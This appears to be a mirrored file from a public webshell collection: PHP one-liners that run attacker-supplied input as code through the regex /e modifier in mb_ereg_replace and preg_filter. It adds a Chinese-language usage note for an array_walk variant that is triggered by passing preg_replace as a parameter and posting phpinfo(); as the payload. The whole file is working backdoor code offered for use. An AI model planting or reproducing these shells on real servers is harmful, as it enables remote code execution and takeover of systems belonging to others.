mirror of
https://github.com/tennc/webshell
synced 2024-11-26 05:00:18 +00:00
29 lines
439 B
PHP
29 lines
439 B
PHP
|
<?php
|
||
|
mb_ereg_replace('\d', $_REQUEST['x'], '1', 'e');
|
||
|
?>
|
||
|
|
||
|
<?php
|
||
|
preg_filter('|\d|e', $_REQUEST['x'], '2');
|
||
|
?>
|
||
|
|
||
|
use like:
|
||
|
|
||
|
```
|
||
|
|
||
|
<?php
|
||
|
$e = $_REQUEST['e'];
|
||
|
$arr = array($_POST['x'] => '|.*|e',);
|
||
|
array_walk($arr, $e, '');
|
||
|
?>
|
||
|
此时提交如下 payload 的话:
|
||
|
|
||
|
Php
|
||
|
shell.php?e=preg_replace
|
||
|
最后就相当于执行了如下语句:
|
||
|
|
||
|
Php
|
||
|
preg_replace('|.*|e',$_POST['x'],'')
|
||
|
这个时候只需要 POST x=phpinfo();
|
||
|
|
||
|
```
|